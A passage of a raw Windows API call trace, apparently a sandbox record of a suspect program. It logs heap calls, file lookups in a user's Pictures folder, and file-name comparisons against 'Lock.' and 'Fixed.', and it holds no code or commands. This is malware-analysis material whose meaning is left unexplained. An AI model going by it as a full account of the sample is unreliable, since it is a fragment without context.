lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/FWAReLHUsSkJL.bmp", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FWAReLHUsSkJL.bmp", lpFilePart=0x8bf658*="FWAReLHUsSkJL.bmp") returned 0x38 [0255.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0255.435] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FWAReLHUsSkJL.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\fwarelhusskjl.bmp")) returned 0xffffffff [0255.435] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3190 | out: hHeap=0x25c0000) returned 1 [0255.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0255.436] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0255.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0255.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0255.437] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0255.437] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.437] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0255.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0255.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0255.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0255.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0255.438] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0255.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0255.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0255.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0255.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0255.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0255.439] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0255.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0255.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="itO8mb4FwKJbnFD", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tO8mb4FwKJbnFD", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0255.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O8mb4FwKJbnFD", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0255.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8mb4FwKJbnFD", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mb4FwKJbnFD", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0255.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b4FwKJbnFD", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4FwKJbnFD", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FwKJbnFD", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wKJbnFD", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0255.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KJbnFD", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JbnFD", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0255.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0255.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0255.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0255.442] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0255.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0255.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0255.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0255.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0255.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="itO8mb4FwKJbnFD", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tO8mb4FwKJbnFD", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O8mb4FwKJbnFD", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8mb4FwKJbnFD", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0255.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mb4FwKJbnFD", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b4FwKJbnFD", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0255.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4FwKJbnFD", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0255.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FwKJbnFD", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wKJbnFD", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KJbnFD", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0255.443] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0255.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0255.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0255.443] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0255.443] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0255.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0255.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0255.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0255.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0255.443] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0255.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0255.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0255.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0255.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0255.443] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0255.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0255.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0255.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0255.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0255.443] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0255.444] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0255.444] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.444] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0255.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0255.444] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0255.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0255.444] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0255.444] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.444] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0255.444] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/itO8mb4FwKJbnFD", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0fec740, ftCreationTime.dwHighDateTime=0x1d4c6bb, ftLastAccessTime.dwLowDateTime=0xc5750b60, ftLastAccessTime.dwHighDateTime=0x1d4c5bd, ftLastWriteTime.dwLowDateTime=0xc5750b60, ftLastWriteTime.dwHighDateTime=0x1d4c5bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa280047, dwReserved1=0x1e0e0, cFileName="itO8mb4FwKJbnFD", cAlternateFileName="ITO8MB~1")) returned 0xaa5860 [0255.445] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0255.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0255.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0255.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0255.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0255.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0255.445] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0255.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0255.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0255.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0255.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0255.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0255.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0255.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0255.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0255.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0255.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0255.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0255.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0255.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0255.447] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0255.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0255.447] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0255.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0255.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0255.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e40 [0255.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0255.447] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0255.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0255.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0255.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.448] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0255.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0255.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0255.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0255.448] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0255.448] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0255.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0255.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0255.448] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0255.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0255.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1b8 [0255.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0255.449] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0255.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0255.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0255.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.449] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0255.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0255.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0255.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0255.450] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0255.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0255.450] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0255.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0255.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0255.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0255.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0255.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.450] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0255.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0255.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0255.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0255.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0255.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0255.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0255.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0255.451] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.451] HeapFree (in: hHeap=0x25c0000, 